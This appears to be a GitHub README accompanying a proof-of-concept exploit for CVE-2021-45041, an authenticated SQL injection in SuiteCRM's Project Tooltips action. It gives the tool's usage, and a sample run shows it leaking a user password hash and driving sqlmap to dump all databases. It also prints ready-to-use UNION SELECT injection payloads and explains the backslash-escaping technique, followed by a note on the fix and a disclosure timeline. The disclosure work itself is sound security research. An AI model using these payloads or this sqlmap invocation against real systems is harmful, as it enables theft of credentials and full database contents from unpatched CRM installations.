# CVE-2021-45041

PoC for [CVE-2021-45041]( aka `SCRMBT-#177` - `Authenticated SQL-Injection in SuiteCRM <= 8.0`

## Usage


(.venv) โžœ  CVE-2021-45041 git:(main) ./ --help
Usage: [OPTIONS]

  -h, --host TEXT          Root of SuiteCRM installation. Defaults to
  -u, --username TEXT      Username
  -p, --password TEXT      password
  -c, --col_count INTEGER  Number of columns to use in union query. Defaults
                           to 44
  -d, --dbms TEXT          DBMs used by SuiteCRM. Defaults to mysql
  -d, --is_core BOOLEAN    SuiteCRM Core (>= 8.0.0). Defaults to False
  --help                   Show this message and exit.

Example usage:

(.venv) โžœ  CVE-2021-45041 git:(main) โœ— ./ --host http://localhost --username user --password ******
INFO:CVE-2021-45041:Login did work - Trying to leak user hash to check if SuiteCRM is vulnerable
INFO:CVE-2021-45041:Received the following hash: $2y$10$WTN2aqQOyHUWxBjubqvYrukTOOE.rrfmE4SoogFbv4kc9dXu7vZzq
INFO:CVE-2021-45041:If this doesn't look like a password hash, the exploit might not work correctly
INFO:CVE-2021-45041:Launching sqlmap against target to get full DB dump
INFO:CVE-2021-45041:sqlmap -u 'http://localhost/index.php?module=Project&action=Tooltips&resource_id=test%5C&start_date=%29+*' --headers 'Cookie: PHPSESSID=93b4g4bfd3ak199iiiands8cv8; sugar_user_theme=SuiteP' --technique U --dbms mysql --union-cols=44 --batch --dump-all
 ___ ___[.]_____ ___ ___  {1.5.12#pip}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:42:51 /2021-12-27/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[21:42:51] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (NULL) - 44 columns (custom)
    Payload: http://localhost:80/index.php?module=Project&action=Tooltips&resource_id=test\&start_date=-8702) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a6a7a71,0x52736356547967794948526b714b71584c55516679466d45537956795a546d664d74516d54644f41,0x716b767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
[21:42:52] [INFO] testing MySQL
[21:42:52] [INFO] confirming MySQL
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
[21:42:52] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.51
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[21:42:52] [INFO] sqlmap will dump entries of all tables from all databases now
[21:42:52] [INFO] fetching database names

## Explanation

I recently discovered an authenticated SQL-Injection in SuiteCRM. I was able to verify the vulnerability in version 8.0 and 7.12.1. The vulnerability is located in the `Tooltips`-Action of the `Project` Module. In a default installation, any user is able to call this action by accessing the following URL (for version 8 add the /legacy prefix):


If we check the implementation of that action (see, we can see that the values are directly taken from `$_REQUEST` without any additional sanitization, and later on used in the `where`-clause of the query.

![vulnerable function](./vulnerable.png)

Although we cannot use single-quotes due to the HTML-Entity encoding, this is still exploitable since there are multiple injection points. If we specify a `resource_id` ending with a backslash (`\`) character, the following single quote will be escaped, and the string will only be terminated by the single quote, after the `BETWEEN` keyword. This means, whatever the client is sending as `start_date`, will be treated as plain SQL and can be used to carry out an SQL-Injection attack.

Here is a minimal PoC which leaks the password hash of a user:

**Version 7.12.1:**


**Version 8.0:**


**URL Decoded Version:**

module=Project&action=Tooltips&resource_id=test\&start_date=) UNION SELECT 0, 1, 2, 3, 4, (SELECT user_hash from users limit 1), 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43 from dual; #


## Implemented fix

Shortly after my report, new SuiteCRM versions (`7.12.2` and `8.0.1`) were released, containing the following fix:

## Timeline

- **13/12/2021**: Vulnerability discovered and reported to SuiteCRM
- **14/12/2021**: Vulnerability confirmed by vendor (SalesAgility)
- **17/12/2021**: Release of fixed versions ([SuiteCRM 7.12.2]( and [SuiteCRM 8.0.1](

## Credits

- [SQLMap](
- [Click](
- [BeautifulSoup](